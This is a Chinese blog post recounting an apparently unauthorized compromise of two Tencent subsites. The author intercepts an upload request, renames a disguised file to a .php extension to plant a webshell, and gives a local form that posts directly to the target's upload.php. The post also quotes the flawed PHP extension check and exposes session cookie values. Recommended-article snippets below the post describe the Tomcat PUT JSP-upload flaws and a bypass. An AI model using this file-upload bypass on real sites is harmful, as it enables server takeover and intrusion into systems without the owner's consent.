说说腾讯分站被黑的过程

最新推荐文章于 2025-09-06 23:40:33 发布
最新推荐文章于 2025-09-06 23:40:33 发布
阅读量1.2w 收藏 14
点赞数
CC 4.0 BY-SA版权
分类专栏: 网络安全技术 文章标签: 腾讯 file ext shell header upload
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/linkboy2004/article/details/5452591

最近腾讯分站被“黑”的消息有蛮人多关注的,某带头大哥就叫我写了篇贴子说说相关的过程是怎样的,进入正题!
                 
      大家都想像得到要黑腾讯这类大站找个明显的漏洞(包括注入)是很难的了,就算注入出密码肯定也加密了,解开了都不一定能找到后台拿shell,必境人家也是有相关的安全部门维护着!上传?除了后台哪里还有?我通过google搜,到处转了转看到腾讯某分站搞了个类似在线做动画的服务,当然前提是要登陆了才行,其中有个功能就是上传你的作品!这个地方能用?不限制上传类型?不试怎么知道!直接上php后缀的马不行,它是用js来控制的,只有jpg,bmp,gif后缀才能显视且才会开始上传。还有什么办法没?那就试试抓包再改后缀喽!内容如下:
     
POST /games/412/upload.php HTTP/1.1
Accept: text/*
Content-Type: multipart/form-data; boundary=----------Ij5Ij5gL6ae0Ef1cH2ei4ae0GI3GI3
User-Agent: Shockwave Flash
Host: xxx.qq.com
Content-Length: 69591       //注意修改后的字数
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: pgv_info=ssid=s1553263453&SPATHTAG=vip.qq.com/|NONE_REF; actwebinfo=1; qqactwebinfo=1; verifysession=7348bade52bad59bd71f3e368fb90efe261cd975f2632c49f622f5e7c95deb1fb0135e2f626632e0; uin=o0032182106; skey=@FXSiKBprF; qv_swfrfh=**********省略n多无关内容!

------------Ij5Ij5gL6ae0Ef1cH2ei4ae0GI3GI3
Content-Disposition: form-data; name="Filedata"; filename="php.php.jpg" //我们去掉.jpg试试
Content-Type: application/octet-stream
.............................................//省略无关内容

结果成功得到php后缀的shell地址,今天人品真不错,这样的漏洞都让我遇到,但是我有注意到域名和上传的页面并不一样,是yyy.qq.com的,进去后发现原来它跟目录下也有个上传文件upload.php,就拖了些相关文件和目录下来分析分析并写了个本地上传方便一些:

<form name="upload_form" action="http://yyy.qq.com/upload.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="upfrom" value="flash" />
请选择文件:
<input name="Filedata" type="file" />
<input type="submit" value="go" />
</form>

下面我们来看看yyy.qq.com/upload.php这个文件

............//省略无关代码
$file_id = md5($_FILES["Filedata"]["tmp_name"] + rand()*100000);

$file_ext = get_file_ext($_FILES["Filedata"]["name"],$allow_ext);     //注意

$filename = $upload_dir.'/'.$fileFolder.'/'.$file_id.'.'.$file_ext;
...........//
elseif($upfrom == 'flash'){
        if(!$file_ext){
                header("HTTP/1.1 500 Internal Server Error");
                echo "bbb";
                exit(0);
        }

        if (!isset($_FILES["Filedata"]) || !is_uploaded_file($_FILES["Filedata"]["tmp_name"]) || $_FILES["Filedata"]["error"] != 0) {
                header("HTTP/1.1 500 Internal Server Error");
                echo "qqq";
                exit(0);
        }

        if(!move_uploaded_file($_FILES["Filedata"]["tmp_name"],$filename)){
                header("HTTP/1.1 500 Internal Server Error");
                echo "ccc";
                exit(0);
        }
............//上面代码用了get_file_ext()我接再跟下去看看;

function get_file_ext($filename,$exts = ''){
        if(!$file_ext = strrchr($filename,'.')){
                return false;
        }
        $file_ext = substr(strtolower($file_ext),1);
        if($exts){
                $arr = explode('|',$exts);
                if(!in_array($file_ext,$arr)){
                        return false;
                }
        }
        return $file_ext;
}
可以看到此函数有叛断后缀是否为$exts里所允许的,但我发现代码里并没有定义$exts变量,也就是为空,所以跳过检查了,直接返回上传时的文件后缀!

   后来皇子牛跟我说他发现xxx.qq.com提供的服务里还能上传头像也能通过上面的方法拿shell,地址就是xxx.qq.com/xxx.php,真没想到一时之间还两个分站有问题,我觉得到这里基本可以确定两分站的漏洞原因都是如上所说.
   事后发现上传shell后没过多久就不见了,就怀凝是不是被发现了,跟皇子牛交流下后认为负载的可能性大些.
   费话了这么久主要原因还是我们的运气好,不然分站也不是这么容易就可拿shell的:)

腾讯了!(实习面经分享)
bigsai
07-12 2647
拿到腾讯Offer了!分享一下个人经验!
腾讯云物联网服务器与微信小程序设计(讲解设备如何上云,如何对接微信小程序)
12-02 7356
腾讯云物联网开发平台是一个标准的MQTT服务器。 这篇文章介绍如何利用`腾讯云物联网开发平台` 创建自己的产品、设备、使用MQTT设备端登录服务器,完成数据上传,命令下发响应,以及开发微信小程序,完成一条龙的 `物联网产品开发` 。
代刷网html统计代码,【QQ代刷网】前台代码大全
weixin_42521558的博客
06-04 4万+
首页滚动代码(自己修改下面的字)direction="left" Align="Middle" style="font-weight:bold;line-height: 20px;font-size: 20px;color:#ff0000;">特价搭建代刷网分站活动!只要1元!首页固定代码(自己修改下面的字)class="list-group-item">class="btn btn-...
腾讯云安全中心监测到  Apache Tomcat 修复了2个严重级别的漏洞,
09-25
9 月 19 日,腾讯云安全中心监测到  Apache Tomcat 修复了2个严重级别的漏洞, 分别为: 信息泄露漏洞(CVE-2017-12616)、远程代码执行漏洞(CVE-2017-12615),在某些场景下,攻击者将分别能通过这两个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意 JSP 文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码。      云鼎实验室通过对于漏洞描述,搭建漏洞环境,并对其进行复现。此漏洞为高危漏洞,即使是非默认配置,但是一旦存在漏洞,那么攻击者可以成功上传 webshell,并控制服务器。 复现 根据描述,在 Windows 服务器下,将 readonly 参数设置为 false 时,即可通过 PUT 方式创建一个 JSP 文件,并可以执行任意代码。    通过阅读 conf/web.xml 文件,可以发现:   默认 readonly 为 true,当 readonly 设置为 false 时,可以通过 PUT / DELETE 进行文件操控。   配置 readonly 为 false: 启动 Tomcat,利用 PUT 请求创建文件: 提示 404。通过描述中的 Windows 受影响,可以结合 Windows 的特性。其一是 NTFS 文件流,其二是文件名的相关限制(如 Windows 中文件名不能以空格结尾)来绕过限制:  访问发现可以正常输出:  分析 Tomcat 的 Servlet 是在 conf/web.xml 配置的,通过配置文件可知,当后缀名为 .jsp 和 .jspx 的时候,是通过JspServlet处理请求的:   可以得知,“1.jsp ”(末尾有一个和空格)并不能匹配到 JspServlet,而是会交由DefaultServlet去处理。当处理 PUT 请求时: 会调用resources.rebind: dirContextFileDirContext: 调用 rebind创建文件: 又由于 Windows 不允许“ ”作为文件名结尾,所以会创建一个 .jsp 文件,导致代码执行。 Bypass 分析 然而,经过盒测试,当 PUT 地址为/1.jsp/时,仍然会创建 JSP,会影响 Linux 和 Windows 服务器,并且 Bypass 了之前的补丁,分析如下。  在进入 bind 函数时,会声明一个 File 变量: 进入 File 后,会对 name 进行 normalize 最后得到的 path 就是没有最后 / 的 path 了: 影响  由于存在去掉最后的 / 的特性,那么这个漏洞自然影响 Linux 以及 Windows 版本。而且经过测试,这个漏洞影响全部的 Tomcat 版本,从 5.x 到 9.x 无不中枪。目前来说,最好的解决方式是将 conf/web.xml 中对于 DefaultServlet 的 readonly 设置为 true,才能防止漏洞。
9 月 19 日,腾讯云安全中心监测到  Apache Tomcat 修复了2个严重级别的漏洞, 分别为: 信息泄露漏洞(CVE-2017-12616)、远程代码执行漏洞(CVE-2017-12615
杨航的专栏
09-25 976
9 月 19 日,腾讯云安全中心监测到  Apache Tomcat 修复了2个严重级别的漏洞, 分别为: 信息泄露漏洞(CVE-2017-12616)、远程代码执行漏洞(CVE-2017-12615),在某些场景下,攻击者将分别能通过这两个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意 JSP 文件,通过上传的 JSP 文件 ,可在用户服务器上执行
关于腾讯分站过程
caiguazheng4921的博客
04-19 292
最近腾讯分站被“”的消息有蛮人多关注的,某带头大哥就叫我写了篇贴子说说相关的过程是怎样的,进入正题! 大家都想像得到要腾讯这类大站找个明显的漏洞(包括注入)是很难的了,就算注入出密码肯定也加密了,解开了都不一定能找到后台拿shell,必境人家也是有相关的安全部门维护着!上传?除了后台哪里还有?我通过google搜,到处转了转看到腾讯分站搞了个类似在...
别再吐槽了:12306网站已接近技术极限
DZT的专栏
01-03 1079
写在前面的话:在我的博客里,有许多自称是资深程序员说12306的问题如何如何容易解决,它的技术如何如何烂,下面是一位真正的内行写的技术分析,但我要修正他一点,关于网站访问量,12306是世界第一,其他任何一个网站无法望其项背。腾讯自称自己的最高日访问量是1.6个亿,而12306这几天的最高日访问量是18个亿,是腾讯的11倍多。而且腾讯是24小时访问,12306后半夜维护,实际开放时间是16个小时左
运维安全概述
swordheart的博客
04-19 6792
0x00 前言 运维安全是企业安全保障的基石,不同于Web安全、移动安全或者业务安全,运维安全环节出现问题往往会比较严重。 一方面,运维出现的安全漏洞自身危害比较严重。运维服务位于底层,涉及到服务器,网络设备,基础应用等,一旦出现安全问题,直接影响到服务器的安全;另一方面,一个运维漏洞的出现,通常反映了一个企业的安全规范、流程或者是这些规范、流程的执行出现了问题,这种情况下,可能很多服务器都存在这类安全问题,也有可能这个服务还存在其他的运维安全问题。 本文一方面希望帮助甲方覆盖一些盲点,另一方面也能够
2014乌云安全峰会文字版记录
aezwm4109的博客
09-24 4029
转自51CTO,先摘录一些我认为比较精彩的部分。全文在下面噢~~~ 猪猪侠: 就如果研究用户密码设置规则的话就得上大数据,这里我们搜集了10亿条用户和用户密码,我们得出了这个东西,我们利用大数据,统计出了100多个使用的最多的弱口令,标红色的是Top10,中国是使用英语较少的国家,我们可以看到前10位全是数字,再看蓝色标记的,这个很有意思,这是一个多情的国家。我还对比一下,我...
SEO基础知识
热门推荐
猿来这样-谢厂节的博客
01-03 5万+
本文内容是我在6年前写的了,其中有很多内容是当时从网上复制的。现在放上来,后面有空闲时间再逐步进行一些适应潮流的修改。同时部份内容对原作者表示感谢。如果您认为对您有侵权内容,请与我联系我及时修正。(QQ 2581529)      许多网站在设计的时候,就需要考虑SEO的影响因素。所以SEO不仅是SEOER的工作,也是开发人员的工作。 一、 什么是SEO 7 一、 什么是SEO 10
20多岁的一无所有,其实是理所应当的
黑白相间...
11-14 2万+
转载:https://blog.youkuaiyun.com/kangwrite/article/details/36184819 23 岁那年你正处在哪个状态?现在呢?&amp;nbsp; 我,23岁,应届毕业生。生活,工作,爱情都处于人生的低谷,一穷二白,一无所有,一事无成。 分享一下成长的建议吧。 匿名用户 23岁那年...
浅谈信息收集
weixin_50464560的博客
03-17 3312
浅谈信息收集 0.写在前面 信息收集对于渗透测试来说是很重要的,是渗透测试的前期准备工作,俗话说知己知彼,才能百战不殆。掌握了对目标的足够信息,我们才能更好地开展渗透测试。 信息收集的方式可以分为两种:主动信息收集和被动信息收集 主动信息收集:是指通过直接和目标访问、各种工具直接对目标网站进行检测。直接使用工具对网站进行信息探测可以获得较多较全的信息,但是可能会被目标主机发现,对你的可疑行为进行记录,分析,可能会对后期的渗透工作产生影响。 被动信息收集:是指通过各种的在线网站等第三方服务对网站进行信息收集。
腾讯云完整建站过程
efew212efe的博客
04-18 5012
一、购买腾讯云域名 1、腾讯云活动进行中,.com域名有优惠,去域名专区看一看吧。腾讯云活动-域名专区 2、建议选择.com的域名(一般来说com更适合营利性质网站),点击立即购买,(需要登录一下,建议使用微信登录,登录后重新点击立即购买)进入域名购买页面 在域名框中输入你要注册的域名,然后点击右侧的搜索图标,如果提示域名校验通过则可以正常购买,然后点击立即购买. 3、在订单页面点击立即支付,跳转支付页面,选择在线支付,然后完成支付即可。 4、进行域名实名认证,在【我的域名】管理页面,选择【未实名认证】页
腾讯云服务器被攻击我是这样应对的
qq_50805795的博客
04-02 6877
先上图 (恶意篡改密码) (恶意登录) 我只是想简单地把web前端地作业上传到云服务器上展示,但是没想到还能被攻击(欲哭无泪)。被恶意登录后,导致访问我的网站时,链接页面时出错,要么图片加载不出来,要不就是直接网站无法访问(我只是个普普通通的学生,注册个服务器交个作业而已,但是没想到这都能被当作靶机,生气!!!) 好吧,但是作业还是要做展示,欸,又要重装系统 还是装Centos 7.6的系统,重装成功后,先修改密码【请设置一个无敌超级复杂的密码吧,起码别是含12345这种暴力破解一百多次.
腾讯云Linux服务器运维,安装JDK、rabbitmq、nginx、Redis、ClickHouse
Java 技术专栏,从入门到精通,熟悉企业级开发
08-29 4万+
腾讯云服务器opencloudos 安装JDK、rabbitmq、nginx、Redis、ClickHouse。
Linux基础知识(二)
最新发布
m0_73915067的博客
09-06 161
1. 怎么理解 I/O 重定向?2. /dev/null 是什么,有什么用途?3. 解释下列命令的结果:&> /dev/null 、2>> file4. 怎么理解管道?管道和重定向有什么区别?5. 在什么情况下需要使用 tee 命令?举例说明如何使用。6. vim 是什么?vim 和 vi 有什么关系?7. vim 里有几种运行模式,分别说明每种模式下的简单操作。8. shell 会话是什么?一个用户可以启动多个 shell 会话吗?
Linux 中 export 命令用法总结
核电子探索者
09-04 1118
Linux中的export命令用于将变量导出为环境变量,使其能被当前Shell及其子进程访问。局部变量仅限当前Shell,而环境变量可跨进程传递。基本语法包括export 变量名=值(一步导出)或先定义再export(两步)。常用场景包括:临时设置环境变量(如PATH)、导出函数供子进程调用、取消导出(export -n)及查看环境变量(export -p)。持久化需将export命令写入~/.bashrc(用户级)或/etc/profile(系统级)。注意事项:带空格的值需引号包裹,子进程修改不影响父进程
Linux 入门到精通,真的不用背命令!零基础小白靠「场景化学习法」,3 个月拿下运维 offer,第二十七天
dbdr0901的博客
09-05 654
本文介绍了Shell脚本编程中的流程控制结构,主要包括条件选择和循环控制。条件选择部分详细讲解了if语句的单分支、双分支和多分支结构,以及case语句的模式匹配用法。循环控制部分重点阐述了for循环的三种格式、while循环及无限循环的实现方式,并提供了多个实用案例,如猜数游戏、DNS查询、服务器监控等。此外,还介绍了循环控制语句continue和break的使用方法,以及shift技术在参数处理中的应用。文章通过大量示例代码展示了Shell脚本编程中流程控制结构的灵活运用,帮助读者掌握编写复杂逻辑脚本的技
pip completion工具作用(生成命令行自动补全脚本)(与pip-bash-completion区别)
Dontla的博客
09-03 899
的工具,它能够让你在使用 Bash、Zsh 或 Fish 等 Shell 时,通过按。通过简单的配置,即可实现命令行自动补全,减少重复输入和错误。是提升 Python 开发效率的小工具,尤其适合频繁使用。自动补全能避免拼写错误,确保命令和参数的准确性。),还支持高级参数(如镜像源、虚拟环境路径等)。命令及其参数,从而提升操作效率。补全功能不仅适用于基础命令(如。
评论 58
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值